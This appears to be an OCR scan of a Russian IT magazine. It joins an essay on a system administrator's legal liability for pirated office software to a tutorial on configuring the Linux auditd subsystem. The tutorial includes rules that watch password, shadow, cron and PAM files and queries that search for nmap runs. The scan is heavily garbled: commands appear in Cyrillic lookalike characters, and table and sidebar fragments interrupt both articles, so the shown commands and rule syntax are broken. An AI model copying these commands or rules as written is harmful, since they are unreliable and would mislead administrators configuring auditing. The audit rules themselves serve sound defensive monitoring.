прочитать, понять и даже воспользоваться ими без помощи адвоката. 
В том мире, где нет войн, все сыты, здоровы, равны и у каждого граж- 
данина есть, по меньшей мере, три раба. В текущей действительности 
все устроено не столь справедливо. Наша ситуация гораздо ближе 
к ленинскому лозунгу «земля — крестьянам, фабрики — рабочим»; 
магазины — продавцам, дороги — гаишникам, законы — юристам. 
После возбуждения уголовного дела (а в запущенных случаях — 
только после приговора суда) до некоторых, наконец, доходит. Эти 
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граждане начинают понимать, что они ничего не понимают из того, 
что написано в законе и спешат к адвокату (или хотя бы на веб-форум 
юристов) за разъяснениями. Это — первая ступень просветления. До 
второй доживают не все. . . 

Легенда о дисклеймере 

Другая легенда, которая имеет хождение среди технарей — это 
легенда о волшебном слове — о дисклеймере. Суть мифа заключается 
в том, что, якобы, можно переложить ответственность, а то и вовсе 
избежать ее путем написания «волшебных слов». Таких как «не несет 
ответственности», «оставляет за собой право» или «отказывается 
от гарантий». Возможно, в детском саду подобное «чур» считается 
достаточным основанием, но во взрослой жизни ответственность в 
большинстве случаев (а уголовная и административная ответствен- 
ность — во всех случаях; это называется «принцип законности») 
определяется законом и не может быть возложена, передана или 
отведена путем заключения двустороннего договора. Тем более — 
одностороннего заявления. 

Тем не менее, вера в волшебное «чур» слишком сильна, чтобы от- 
казаться от нее на том смехотворном основании, что это, дескать, 
противоречит закону. Если верующему сказать, что бога нет, 
он вряд ли превратится в тот же миг в атеиста. Еще и обидеться 
может. Так и сисадмины, обращаясь к правоведам за консультация- 
ми, упорно спрашивают, что бы им такого хитровыкрученного 
написать в дисклеймере, договоре, лицензионном соглашении, 
расписке, чтобы не отвечать за нарушения авторских прав? Ты 
им объясняешь про принцип законности, а они снова: «Так что же 
надо написать?». 

«Договориться» с законом нельзя. Можно — с его представителями. 
Иногда. Если у них уже выполнен план по поимке «пиратов». Любые 
договоры, расписки, дисклеймеры и прочие «чур, не нарушение» 
не сработают. Хуже того — послужат доказательством умысла или 
сговора. 



Что делать с контрафактом? 

Поняв, что идет кампания по борьбе за вступление в ВТО соблюдение 
авторских прав, и, видя, что снаряды ложатся все ближе, представите- 
ли нашей с тобой профессии начали проявлять беспокойство. Читаем 
ЖЖ и форумы: вчера взяли Пупкина, сегодня была проверка у Хлюп- 
кина, а завтра назначен суд у Занупкина, и он лихорадочно занимает 
денег на адвоката. Поневоле сисадмин задумывается — а каковы его 
собственные риски? 

Даже если сисадмин откажется сам инсталлировать контрафакт, 
ему наверняка придется иметь дело с «наследством». Или с самодея- 
тельностью пользователей. Как уже упоминалось, нарушением 
закона является неразрешенное правообладателем воспроизведение 
программы. Здесь «воспроизведение» — это юридический термин, не 
имеющий ничего общего с кнопкой «ріау». Юридическое воспроизве- 
дение соответствует кнопке «гесогб». Для компьютерных программ 
воспроизведение — это инсталляция. Запуск же программы на 
исполнение воспроизведением не считается. Но может считаться 
иным использованием объекта интеллектуальной собственности 
(правда, по этому поводу у юристов не сложилось единого мнения) . То 
есть, однозначно виноват лишь тот, кто программу инсталлировал. В 
теории. На практике бывает по-разному. 

Когда начинается расследование, вину могут возложить не на того, 
кто когда-то инсталлировал контрафактный софт, а на того, кто ныне 
его обслуживает. Во-первых, на время инсталляции могут не обратить 
внимания, ограничившись свидетельскими показаниями. Во-вторых, 
запуск и обслуживание контрафактных программ также могут при- 
знать их использованием, то есть нарушением авторских прав. 

Так произошло в одном деле, где автор выступал в качестве консуль- 
танта. Следователь вызвал на допрос всех работников и выбрал пока- 
зания тех из них, кто сказал, что «весь софт в офисе устанавливал наш 
сисадмин». Трех свидетелей с лихвой хватило для обвинительного 
приговора. С седой древности свидетельские показания — это дока- 
зательство номер один (не считая «царицы», разумеется) . Со времен 
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■ С этим борются 
□ С этим мирятся 



1) Нарушение авторских прав 

2) Неправомерный доступ 

31 Нарушение порядка защиты 
персональных данных 



НИЗКАЯ СРЕДНЯЯ ВЫСОКОЕ 



Общественная опасность 



> 



Правовые прыщи и коррупционные пузыри 



того же Хаммурапи судьи доверяют живым свидетелям несравненно 
больше, чем всяким экспертизам, логам, листингам, детализациям и 
прочим непонятным штукам. 

Кто защищает контрафакт? 

Итак, что делать, если ты пришел на должность и обнаружил в под- 
ведомственном хозяйстве нелицензионного софта больше чем на 
50 тысяч (порог наступления уголовной ответственности) рублей? Не 
стоит надеяться, что в «случае чего» тебе удастся свалить все на неиз- 
вестного предшественника или на текущих пользователей. Пользова- 
тели, как показывает практика, легко объединяются против админа 
и дружно указывают на него пальцем, подводя под монастырь. Хотя 
если бы каждый юзер взял на себя свою часть контрафакта (меньше 
чем на 50 тысяч каждый) , то уголовной ответственности избежали 
бы все. Но офис — это тебе не сицилийская мафия с омертой (отепа 
— обет молчания, часть круговой поруки, скрепляющий итальянские 
мафиозные структуры. За любую информацию властям — смерть) . 
Поэтому доставшийся в наследство контрафакт рекомендуется как 
можно быстрее извести. После прополки компьютеров следует также 
почистить реестры и всяческие закоулки файловых систем от остат- 
ков. При нехватке доказательств оставшиеся от удаленных программ 
«хвосты» также подшиваются к делу и засчитываются в общую сумму 
нарушений. Есть несколько утилит, умеющих обшаривать углы в 
поисках таких следов. Например, «ОеРасФ». Ею часто пользуются и 
сотрудники правоохранительных органов для оценки состава, коли- 
чества и степени контрафактности установленных программ. 

Самый интересный вопрос — как именно сисадмину снести опасный 
софт? Его же брали на должность с очевидным условием: «чтобы все 
работало», а если он начнет свою деятельность с удаления львиной 
доли программ, его могут, мягко выражаясь, не понять. Ситуа- 
ция действительно щекотливая. Как привести ее в соответствие с 
законом, если изначально бизнес строится на его нарушении? Как 



избавиться от риска привлечения к ответственности, если админа 
зачастую и нанимают именно как громоотвод — чтобы он взял этот 
риск на себя? Ошибка не в том, что вы на этот риск соглашаетесь. 

А в том, что не воспринимаете его как одно из условий трудового 
контракта. Когда внезапно оказывается, что помимо обслуживания 
сети надо еще и исполнять роль зицпредседателя Фунта (Фунт — 
персонаж культовой книги советских времен «Золотой теленок»; 
символ подставного лица) , вы должны сразу заявить директору: «Мы 
так не договаривались ! ». Конечно, можно пойти на риск привлече- 
ния к ответственности, ведь вероятность возбуждения дела вовсе не 
равна единице, а типичный приговор по 146-й статье — год-полтора 
условно. Не смертельно. Однако брать грех на свою душу (и судимость 
в анкету) надо сознательно. И за соответствующую компенсацию. 
Если же громоотводом сисадмин работать не готов, у него есть два 
пути: так или иначе избавиться от контрафакта (по договоренности 
или со скандалом), либо как можно быстрей покинуть эту опасную 
должность. 

Как провести зачистку? 

Удаление нелицензионных программ совсем (без замены) или их 
замещение свободными аналогами возможно не на любом предприя- 
тии. Для одних это вызовет лишь некоторое увеличение расходной 
части бюджета и период адаптации работников к новому софту. На 
такие жертвы многие руководители, в принципе, пойти готовы. 
Конечно, можно поставить их перед жестким выбором, или сделать 
все явочным порядком, или уговорить, прельстив существенным 
снижением рисков. Но для других такой путь неприемлем. Есть много 
ситуаций, когда затраты на легальное ПО станут для предприятия 
фатальными — оно перестанет быть прибыльным. Как вы понимаете, 
тут что-то доказывать руководству бесполезно. Надо сваливать. 
Разумеется, внезапно и без предупреждения сносить все пиратс- 
кие программы не рекомендуется. Начинать следует с докладной 
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отношение 


собственность 


Собственность 


когда возникло 


ранее 4000 по до н. э. 


примерно в XVII веке н. э. 


где провозглашается 


ст. 35 конституции РФ 


ч. 1 ст. 44 Конституции РФ 


чем является 


естественным правом человека 


искусственной монополией (привилегией) 


общественная опасность нарушения 


прямой ущерб 


недополученная прибыль 


термины 


собственник, владелец; 


правообладатель; 


хищение, мошенничество, кража, грабеж, разбой 


нарушение авторских прав, плагиат, (пиратство) 


отношение к морали 


присутствие во всех этнических системах и религиях 


только начинается вводиться в мораль (сконца XX века) 



Собственность и интеллектуальная собственность 



записки, прохождение которой обязательно задокументировать: 
отметка канцелярии на втором экземпляре, входящий номер или 
хотя бы пара свидетелей. По бухгалтерским документам следует 
установить, что из используемого софта является нелицензи- 
онным, а что из этого действительно необходимо для работы. 
Замечу, что лицензионность/контрафактность программ — это 
не техническая характеристика и не может быть установлена ана- 
лизом самих программ. Лицензионная отличается только тем, что 
за нее уплачены деньги (или заключен безвозмездный лицензион- 
ный договор). Поэтому установить [не]лицензионность программ 
без помощи бухгалтера трудно. 

Лучше всего оформить эту инвентаризацию актом с участием 
бухгалтера (себе оставить копию). Затем подать по инстанциям 
заявку/спецификацию на приобретение недостающих лицензий 
или план перехода на свободный софт. После этого можно начи- 
нать действовать. 

Но есть один нюанс. Докладная записка «у нас контрафактный 
софт, прошу дать денег на лицензии» сыграет в твою пользу, толь- 
ко если ты в дальнейшем предпримешь действия по исправлению 
ситуации. Если же ограничишься информированием начальства 
о факте, то записка выступит не оправданием, а доказательством 
преступного сговора: начальник приказывал нарушать авторские 
права, сисадмин знал о нарушении и исполнял этот заведомо неза- 
конный приказ. А исполнение заведомо незаконного приказа (ч. 2 
ст. 42 УК) не освобождает от ответственности. 

После совершения упомянутых «предупредительных выстрелов» 
можно сносить весь незаконный софт. 

Некоторые деятели предпочитают иной вариант: «самому напи- 
сать заявление в правоохранительные органы, не дожидаясь, ког- 
да на тебя донесут другие». Такое заявление не станет индульген- 
цией, если вы сами приложили руки к установке нелицензионного 
софта; в этом случае оно будет иметь статус «явки с повинной», 
сильно смягчит наказание, но освобождение от ответственности 
не гарантирует. Автор не является поклонником доноса на собс- 
твенное предприятие, в основном по моральным соображениям. Я 
бы предпочел пресечь правонарушение собственными руками. 
Айтишники, обратившиеся за юридической консультацией, 
часто ставят вопрос таким образом: «как прекратить наруше- 
ния, избавиться от риска, но при этом не испортить отношения с 
начальством»? Такой постановки автор не приемлет. Для нормаль- 
ного начальства в нормальной лавке факт нарушения авторских 
прав — вполне достаточный аргумент, после которого босс станет 
помогать тебе избавиться от контрафакта. Если же не помогает 
(и пуще того, запрещает удалять пиратку, а денег на лицензию не 
дает), то это не предприятие, а организованная преступная груп- 
па, в просторечии именуемая шайкой. Вступил в шайку — принял 
риск. Разумеется, в среде благородных рыцарей командир берет на 



себя вину подчиненного. А вот в преступной группе, каковую вы 
со своим начальником составляете (один приказывает совершать 
преступление, другой исполняет), моральные нормы иные. Пахан 
всегда пожертвует сявкой. Да, он приказывал, но он — на то и 
пахан, чтобы приказывать. А вина будет свалена на шестерку, по- 
тому она так и называется — шестерка. Когда попадается, выбор у 
нее не очень широк: признать единоличную вину или попытаться 
заодно утащить с собой пахана. Варианта «избежать ответствен- 
ности» нет. Для этого не надо было участвовать в шайке. 

Так что соблюсти закон и не поссориться с главарем преступной 
группы — цели несовместимые. 

Как уйти красиво (и безопасно)? 

Если устранение нарушений авторских прав невозможно или 
экономически нецелесообразно, а риск не соответствует опла- 
те — надо уходить. И, уходя, оборвать ниточки, за которые тебя 
впоследствии могли бы притянуть к чужим нарушениям. 

Как уже указывалось, текущий сисадмин является наиболее удоб- 
ным кандидатом в подозреваемые. Его предшественник — не 
самый удобный, но вероятный, особенно если текущий только- 
только вступил в должность и свалить на него слишком многое 
будет затруднительно. Тем более, если твой преемник догадался 
оформить принятие дел актом с указанием всех компьютеров и 
перечнем установленного на них ПО. Понял намек? Да, инвен- 
таризация софта будет полезна как при поступлении, так и при 
увольнении. Только в отличие от материальных ценностей, надо 
постараться, чтобы при приеме хозяйства в ведомости оказалось 
как можно больше, а при сдаче дел — как можно меньше. 
Увольнение с конфликтом — хороший повод постижения на 
практике утверждений из первого параграфа данной статьи. 
Помни, что ты — технарь, а твои противники — управленцы 
(бюрократы, если угодно). Не пытайся играть и не надейся выиг- 
рать на их поле и по их правилам. Если не удалось договориться, 
обратись к адвокату. Вошедшая в анекдоты западная привычка 
подключать юриста по любому поводу возникла не от хорошей 
жизни. А от того, что неискушенных людей много и часто под- 
ставляли. 

Заключение 

Не похоже, чтобы в ближайшие годы накал борьбы за авторские 
права начал ослабевать. Тенденции намекают на то, что план по 
146-й статье снижаться не будет. После вылавливания довер- 
чивых «черных инсталляторов» правоохранительные органы 
плотнее возьмутся за офисы. А потом, может быть, и за домашних 
пользователей. Так что риски дорожают, а желание предприни- 
мателей перевалить их на сисадминов становится все сильнее. 
Предохраняйся! т 
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На нашем дискеты найдешь пример 
рабочего файла правил а исііісі, 
который сможешь использовать на 
своем сервере под управлением 
ОеЬіап/ІІЬипІи. 



Грамотная после-установочная настройка Ипих-дистрибутива — лишь первый шаг на пути 
к безопасности и стабильности. Чтобы операционная система и дальше продолжала отвечать 
этим требованиям, придется приучить себя к постоянному слежению за ее состоянием. 

Этого можно достичь с помощью мониторинга и анализа лог-файлов, однако получение полного 
контроля над системой возможно только с помощью аудита системных событий. 



ПЕРЕД ТЕМ КАК ПЕРЕЙТИ К ОСНОВНОЙ ЧАСТИ СТАТЬИ, ПОСТАРАЕМСЯ 
РАЗОБРАТЬСЯ С ТЕМ, ЧТО ЖЕ ВСЕ-ТАКИ ПРЕДСТАВЛЯЕТ СОБОЙ СИС- 
ТЕМНЫЙ АУДИТ (ИЛИ АУДИТ СИСТЕМНЫХ СОБЫТИЙ). По самой своей 
сути это не что иное, как постоянное и подробное протоколирование 
любых событий, происходящих в операционной системе. Аудиту 
могут быть подвержены такие события, как чтение/запись файлов, 
выполнение входа в ОС, запуск и остановка приложений, инициация 
сетевого соединения и многое, многое другое. Ілпих, как и любая 
другая современная серверная ОС, включает в себя все необходимые 
инструменты для проведения аудита системы, однако разобраться в 
них с наскоку не так-то просто. 

Система аудита ядра 2.6 

Начиная с версии 2.6, ядро Ілпих включает в себя подсистему, специ- 
ально разработанную для проведения аудита. Она позволяет вести 
слежение за такими системными событиями, как: 

Запуск и завершение работы системы (перезагрузка, остановка); 

• Чтение/запись или изменение прав доступа к файлам; 

• Инициация сетевого соединения или изменение сетевых настроек; 

• Изменение информации о пользователе или группе; 

• Изменение даты и времени; 

Запуск и остановка приложений; 

• Выполнение системных вызовов. 

На деле этот список гораздо длиннее, но другие типы событий не 
представляют для нас практического интереса. Кроме самого факта 
возникновения события, система аудита представляет такую инфор- 
мацию, как дата и время возникновения события, отвественность 
пользователя за событие, тип события и его успешность. Сама по себе 
она способна лишь сообщать о произошедшем событии, тогда как 
процесс журналирования возлагается на плечи демона аисііісі. 

Установка 

Демон аисііісі доступен в любом современном Ііпих-дистрибутиве и 
может быть установлен с помощью стандартного менеджера пакетов. 
Например, чтобы установить аисііісі в ПеЪіап/іЛэипіи, достаточно вы- 
полнить следующую команду: 

$ зисіо арІі-деЬ іпзЬаІІ аисіііісі 

Кроме самого демона, вместе с пакетом будут установлены три подсоб- 
ные утилиты, используемые для управления системой аудита и поиска 
записей в журнальных файлах: 



аисііісіі — утилита, управляющая поведением системы аудита. 
Позволяет узнать текущее состояние системы, добавить или удалить 
правила; 

аиігасе — аудит событий, порождаемых указанным процессом (ана- 
лог зігасе); 

аизеагсН — команда, позволяющая производить поиск событий в 
журнальных файлах; 

аигерогі — утилита, генерирующая суммарные отчеты о работе сис- 
темы аудита; 

По умолчанию система аудита находится в спящем состоянии и не реаги- 
рует ни на какие события (ты можешь убедиться в этом, выполнив коман- 
ду «зисіо аисііісіі -1») . Чтобы заставить систему сообщать нам подробности 
каких-либо событий, необходимо добавить правила. Но чтобы понять, 
как их составлять, придется разобраться с тем, как работает подсистема 
аудитаядра Ілпих. 

Аудит системных событий 

Ни одно событие в любой операционной системе не может произойти 
без использования системных вызовов ядра. Запуск нового процесса, от- 
крытие файлов и работа с ними, запрос времени или типа ОС, обращение 
к оборудованию, создание сетевого соединения, вывод информации на 
экран — все эти операции производятся с помощью обращения к функци- 
ямядра операционной системы, для краткости называемых системными 
вызовами. Если приложение не прибегает в своей работе к вызовам ядра, 
оно оказывается замкнутым в самом себе и просто не способно к какому- 
либо взаимодействию со своим окружением, не говоря уже о пользовате- 
ле. Следовательно, чтобы отследить любое системное событие, достаточ- 
но просто перехватывать все обращения к системным вызовам. 

Именно это делает подсистема аудита. Она устанавливает триггеры до 
и после всех функций, ответственных за обработку системных вызо- 
вов, и ждет. Когда происходит системный вызов, триггер срабатывает, 
подсистема аудита получает всю информацию о вызове и его контексте, 
передает ее демону аисііісі и отдает дальнейшее управление функции, 
обрабатывающей системный вызов. После ее завершения срабатывает 
«выходной» триггер, и вся информация о системном вызове вновь посту- 
пает к подсистеме аудита и демону аисііісі . 

Естественно, держать все эти триггеры в активном состоянии все время 
работы ОС накладно и слишком избыточно (только во время старта 
приложение может выполнить несколько тысяч системных вызовов и для 
полного анализа журнала аудита придется убить уйму времени) . Поэтому 
по умолчанию триггеры отключены и могут быть выборочно активиро- 
ваны с помощью правил, которые задают имя системного вызова, его 
успешность, пользователя, от имени которого произошел вызов и т.д. 
Благодаря такой нехитрой схеме, системный администратор может 
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вести наблюдение за любым аспектом работы операционной системы 
(кроме, конечно же, тех событий, которые вызваны компонентами 
самого ядра) . Поэтому, если в системе происходят какие-либо подозри- 
тельные действия, вызванные работой взломщика или вредоносного 
ПО, с помощью системного аудита не составит труда их выявить и 
найти виновного. 

Правила аудита 

Для создания, удаления и модификации правил аудита предназначена 
утилита аисИтстІ. Есть три основных опции, которые принимает эта 
команда: 

• -а — добавить правило в список; 

• -6 — удалить правило из списка; 

• -О — удалить все правила; 

• -I — вывести список заданных правил. 

Если ты сейчас выполнишь команду «аисіксй -1» от имени администра- 
тора, то, скорее всего, увидишь «N 0 гиіез», а это значит, что ни одного 
правила аудита еще не существует. Для добавления правил использует- 
ся следующая форма записи команды аибКсЙ: 

# аисНРсРІ -а список , действие -3 имя_системного_вызова 
-Р фильтры 

Здесь список — это список событий, в который следует добавить пра- 
вило. Всего существует пять списков: 

• Іа$к — события, связанные с созданием процессов; 

епіту — события, происходящие при входе в системный вызов; 

• ехіі — события, происходящие во время выхода из системного 
вызова; 

• изег — события, использующие параметры пользовательского про- 
странства, такие как иісі, ріб и §іб; 

ехсіибе — используется для исключения событий. 

Не беспокойся, если смысл списков кажется тебе непонятным. По сути, 
это всего лишь фильтры, которые позволяют сделать правила более 
точными. Наделе из них используются только епіту и ехіі:, которые 
позволяют зарегистрировать либо сам факт обращения к системному 
вызову, либо его успешную отработку. 

Второй параметр опции — '-а' — это действие, которое должно про- 
изойти в ответ на возникшее событие. Их всего два: пеѵег и аіѵѵауз. В 
первом случае события не записываются в журнал событий, во втором 
— записываются. 

Далее указывается опция '-3', которая задает имя системного вызова, 
при обращении к которому должен срабатывать триггер (например, 
ореп, сіозе, ехіі:, и т.д.) . Вместо имени может быть использовано число- 
вое значение. 



Необязательная опция '-Р' используется для указания дополнительных 
параметров фильтрации события. Например, если мы хотим вести 
журнал событий, связанных с использованием системного вызова 
ореп(), но при этом желаем регистрировать только обращения к фай- 
лам каталога /еіс, то должны использовать следующее правило: 

# аисНРсРІ -а ехіР , аімауз -8 ореп -Р раРЪ=/еРс/ 

Чтобы еще более сузить круг поисков, сделаем так, чтобы регистриро- 
вались только те события, при которых файл открывается только на 
запись и изменение атрибутов: 

# аисНРсРІ -а ехіР , аіѵгауз -8 ореп -Р раЫі=/еРс/ -Р регш=аѵ^ 

Здесь 'а' — изменение атрибута (то есть атіЪше сЬап§е), а V — запись 
(то есть ѵѵгйе) . Также можно использовать 'г' — чтение (геаб) и 'х' — 
исполнение (ехесіпе) . Другие полезные фильтры включают в себя: 
ріб — события, порождаемые указанным процессом, арій — события, 
порождаемые указанным пользователем, зиссезз — проверка на то, 
был ли системный вызов успешным, аі, а2, аЗ, а4 — первые четыре 
аргумента системного вызова. Фильтр кеу используется для указания 
так называемого ключа поиска, который может быть использован для 
поиска всех событий, связанных с этим ключом. Количество возмож- 
ных фильтров достаточно велико, их полный список можно найти в 
тап-странице аисійсй. 

Вообще, для слежения за файлами в аибКсй предусмотрен специаль- 
ный синтаксис, при котором опцию '-5' можно опустить. Например, 
описанное выше правило может быть задано следующим образом 
(здесь опция '-р' — это эквивалент фильтра репп) : 

# аисНРсРІ -а ехіі: , аімауз -Р с!іг=/еРс/ -Р регш=^а 

Или используя более короткую форму (здесь оцпия ’-р' — это эквива- 
лент фильтра репп, а '-к' — фильтра кеу) : 

# аисНРсРІ -ѵі /еРс/ -р ѵга. -к ассезз_еРс 

Таким же образом может быть установлена «слежка» за любым инди- 
видуальным файлом: 

# аисІіРсРІ ~Ѵ7 /еРс/раззтж! -р ѵг а 

Конфигурационные файлы 

Правила не обязательно задавать, используя командную строку. 

Во время старта демон аисМ читает два файла: /ещ/аибп/аибпс!. 
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Гарфик, созданный с помощью скриптов от 51еѵе СшЬЬ 



сопі и /ещ/аийк/аисіц.гиіез (в некоторых дистрибутивах они могут 
находиться прямо в /еіс) . Первый описывает конфигурацию демона 
и содержит такие опции, как имя журнала, его формат, частота обнов- 
ления и другие параметры. Нет смысла их изменять, разработчики 
дистрибутива уже позаботились о грамотной настройке. 

Второй файл содержит правила аудита в формате аисШсЙ, поэтому все, 
что нужно сделать, чтобы получить правило, пригодное для записи в 
этот файл — просто опустить имя команды. Например: 

-ѵг /ебс/разз члб -р ѵга 

В начале файла обычно размещаются несколько мета-правил, задаю- 
щих конфигурацию и очищающих правила: 

# Удаляем все правила из всех списков 
-Б 

# Указываем количество буферов , хранящих сообщения ау- 
дита 

-Ь 8192 

# Что делать в чрезвычайной ситуации (например, если все 
буферы будут заполнены) 

# 0 — ничего не делать 

# 1 — поместить сообщение в бтезд 

# 2 — отправить ядро в панику (кегпеі рапіс) 

-1 1 

Далее можно разместить свои правила. 

Примеры правил 

Первое, что следует сделать — настроить наблюдение за всеми 
конфигурационными и лог-файлами системы аудита. Если взломщик 
сможет компрометировать один из них, он наверняка изменит пове- 
дение демона, и мы просто не сможем найти его следы. 

#ѵі/е(с/аис1і(/аисШ.гиІе5 

# Наблюдение за конфигурационными файлами 
-ѵг /ебс/аибіб/аибібб. сопб -р ѵга 

-ѵг /ебс/аибіб/аибіб . гиіез -р ѵга 
-ѵг /ебс/ІіЪаибіб . сопб -р ѵга 



-ѵі /ѵаг/іод/аибіб/ 

-ѵг /ѵаг/іод/аибіб/аибіб . Іод 

Далее установим наблюдение за наиболее важными системными 
конфигурационными файлами. Изменение хотя бы одного из них 
может привести к открытию дыры в безопасности системы, чего 
допустить нельзя. Обрати внимание, что некоторые файлы акту- 
альны только для дистрибутивов НеЬіап/ІіЬипш! 

# ѵі /еіс/аисШ/аисііІ.гиІег 

# Настройки и задания аб 
-ѵі /ѵаг/зрооі/аб 

-ѵі /ебс/аб.аііо ѵг 
-ѵг /ебс/аб . бепу 

# Задания сгоп 

-ѵг /ебс/сгоп . аііо ѵі -р ѵга 
-ѵі /ебс/сгоп . бепу -р ѵіа 
-ѵг /ебс/сгоп. б/ -р ѵга 
-ѵг /ебс/сгоп . баііу/ -р ѵга 
-ѵг /ебс/сгоп .бюигіу/ -р ѵга 
-ѵі /ебс/сгоп .шопбЫу/ -р ѵга 
-ѵі /ебс/сгоп .меекіу/ -р ѵга 
-ѵі /ебс/сгопбаЬ -р ѵіа 
-ѵі /ѵаг/зрооі/сгоп/гооб 

# Файлы паролей и групп 
-ѵі /ебс/дгоир -р ѵга 

-ѵі /ебс/разз мб -р ѵіа 
-ѵг /ебс/зкабо ѵі 

# Конфигурационные и журнальные файлы входа в систему 
-ѵі /ебс/іодіп. бебз -р ѵга 

-ѵі /ебс/зесигеббу 
-ѵі /ѵаг/іод/баіііод 
-ѵі /ѵаг/іод/іазбіод 

# Список и имена хостов 
-ѵі /ебс/бюзбз -р ѵга 



-ѵг /ебс/бебаиіб/аибібб -р ѵга # Стартовые скрипты демонов 

-ѵі /ебс/іпіб . б/ 

# Наблюдение за журнальными файлами -ѵі /ебс/іпіб . б/аибібб -р ѵга 
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Малоинформативный отчет аигероіТ 



Вывод команды «аигерогі -Р» легко отфиль- 
тровать с помощью дгер 



# Пути поиска библиотек 
-ѵг /ебс/іб . зо . сопб . б 

-ѵг /ебс/16 . зо . сопб -р ѵіа 

# Настройки времени 

-ѵг /ебс/іосаібіте -р ѵга 

# Системные переменные 

-ѵг /ебс/зузсбі . сопб -р ѵга 

# Правила загрузки модулей 
-ѵг /ебс/тобргоЪе . б/ 

# Модули системы РАМ 
-ѵг /ебс/рат. б/ 



-а епбгу,а1ыауз 
-а епбгу,а1ыауз 
-а епбгу,а1мауз 
-а епбгу , аімауз 
-а епбгу , аімауз 



-8 Ізебхаббг 
-8 бзебхаббг 
-8 гетоѵехаббг 
-8 Ігетоѵехаббг 
-8 бгетоѵехаббг 



# Создание файлов устройств 
-а епбгу,а1ыауз -8 гпкпоб 



# Монтирование файловых систем 

-а епбгу , аімауз -8 шоипб -8 ишоипб -8 ишоипб2 



# Использование системного вызова рбгасе для 
отладки процессов 
-а епбгу,а1ыауз -8 рбгасе 



# Настройки сервера 88Н 
-ѵг /ебс/ззП/ззНб_сопбід 

Настроим наблюдение за всеми системными 
вызовами, которые могут угрожать безопасности 
системы. Эти правила следует применять толь- 
ко в случае особой необходимости, они создадут 
высокую нагрузку на систему аудита и приведут к 
существенному разрастанию журнальных файлов, 
однако взамен ты получишь тотальный контроль 
над системой и сможешь легко выявить малейшее 
нарушение ее работы. 

# ѵі /еіс/аисііі/аисііі.гиіез 

# Изменение прав доступа к файлам 

-а епбгу,а1ыауз -8 сбшпоб -8 бсбшпоб -8 сбюѵт 
-8 сбюѵт32 -8 бсбюші -8 бсбюѵт32 -8 Ісбюші -8 
1сбюѵлі3 2 



Анализ журнальных 
файлов 

Журнальные файлы, создаваемые демоном аисіііхі в 
каталоге /ѵаг/1о§/аибіі:, не предназначены для чтения 
человеком, но хорошо подходят для анализа с помо- 
щью специальных утилит, устанавливаемых вместе 
с самим демоном. Самая важная из них — утилита 
аигерогб, генерирующая отчеты из лог-файлов. Вызвав 
ее без аргументов, мы узнаем общую статистику ис- 
пользования системы, включая такие параметры, как 
количество входов и выходов из системы, открытых 
терминалов, системных вызовов и т.д. Эта информа- 
ция малоинтересна, поэтому лучше запросить более 
детальный отчет. Например, запустив команду с фла- 
гом '-Г, мы получим список файлов, 
к которым происходил доступ: 

$ зибо аигерогб -б 



# Создание, открытие или изменение размеров 
файлов 

-а епбгу,а1мауз -8 сгеаб -3 ореп -8 бгипсабе 
-8 бгипсабеб4 -8 ббгипсабе -8 ббгипсабеб4 

# Создание и удаление каталогов 
-а епбгу,а1мауз -8 шкбіг -8 гаібіг 

# Удаление или создание ссылок 

-а епбгу , аімауз -8 ипііпк -8 гепаше -3 Ііпк 
-8 зутііпк 

# Изменение расширенных атрибутов файлов 
-а епбгу,а1мауз -8 зебхаббг 



Скорее всего вывод будет слишком длинным, но его 
можно сократить с помощью запроса информации 
только за определенный период времени (аргумент 
'-епсГ не обязателен) : 

$ зибо аигерогб -б --збагб 08/20/10 12:00 

--епб 08/20/10 13 : 00 

Кроме числового значения времени можно исполь- 
зовать следующие специальные сокращения: поѵѵ 
(сейчас), гесегл (десять минут назад), бойау (начиная 
с полуночи), уезбегйау (вчерашние сутки), бйіз-ѵѵеек 
(неделя), бЫз-топбЪ. (месяц) или бЫз-уеаг (год). Вывод 
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Зіеѵе СгиЬЬ из 
компании РесІ Н аб 
написал два неболь- 
ших скрипта для ви- 
зуализации отчетов 
системы аудита: 

• ЬбрУ/реорІе. 
гесІЬабсопп/здгиЫэ/ 
аисік/ѵізиаііге/ 
ткдгарЬ 

• ЬбрУ/реорІе. 
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аисІіі/ѵізиаІіге/ппкЬаг 




> ѵѵагпіпд 



Чтобы изменения, 
внесенныетобой в кон- 
фигурационные файлы 
демона аисіібсі, вступили 
в силу, необходимо 
перезагрузитьдемон с 
помощью команды 
«Мс/іпібб/аибіЫ 
гезіаіі». 
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Команда «аигерогі —і — зиттагу» наглядно покажет, 
какие файлы и сколько раз были открыты 

команды разбит на несколько столбцов, которые имеют следую- 
щие значения (слева направо) : 

1. Просто числовой индекс; 

2. Дата возникновения события; 

3. Время возникновения события; 

4. Имя файла; 

5. Номер системного вызова (чтобы увидеть его имя, используй 
флаг Ч’); 

6. Успешность системного вызова (уе$ или по); 

7. Имя процесса, вызвавшего событие; 

8. АисЛТ II Ю (АІІЮ). О нем читай ниже; 

9. Номер события. 

Вывод этой команды также можно существенно сократить, если 
указать флаг '-зиттагу', который заставляет аигерогі: выводить 
не все случаи доступа к файлом, а только их общее количество по 
отношению к каждому из файлов: 

$ зисіо аигерогі: -і -і --зкагк гесепк --зиттагу 

Вывод команды будет разбит на две колонки, первая из которых 
отражает количество попыток доступа к файлу (успешных или 
нет), а вторая — его имя. Просматривая суммарный отчет ис- 
пользования файлов и заметив подозрительную попытку доступа 
к одному из системных/скрытых/личных файлов, можно вновь 
вызвать аигерогі:, чтобы найти процесс, который произвел эту 
попытку: 

$ зисіо аигерогі: -Щ -і --зкагк косіау I дгер /еЬс/раззтжі 

Получив список всех попыток доступа и номера событий, каждое 
из них можно проанализировать индивидуально с помощью ути- 
литы аизеагсй: 

$ зисіо аизегсй -а номер_события 

Также аизеагсЬ можно использовать для поиска событий по именам 
системных вызовов: 

$ зисіо аизеагсй -зс ркгасе -і 
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V 1 

Вывод команды аизегсЬ не так-то просто понять 

Идентификаторам пользователей: 

$ зисіо аизеагсй -иі 2010 

Именам исполняемых файлов: 

$ зисіо аизеагсй -х /изг /Ып/птар 

Имени терминала: 

$ зисіо аизеагсЬ -кт ркз/0 

Именам демонов: 

$ зисіо аизеагсй -кт сгоп 

Или ключам поиска: 

$ зисіо аизегсЬ. -к екс_ассезз 

Вывод аизеагсЬ также может быть сокращен с помощью использо- 
вания временных промежутков, наподобие тех, что мы использо- 
вали при вызове аигерогі. Сам аигерогі позволяет генерировать 
отчеты не только по использованию файлов, но и многих других 
типов событий, как, например, системные вызовы (флаг ’-з'), 
попытки аутентификации (флаг '-аи') , успешные логины (флаг 
’-Г), модификации аккаунта (флаг '-т') и многих других (полный 
список смотри в тап-странице) . Отчеты можно получать только 
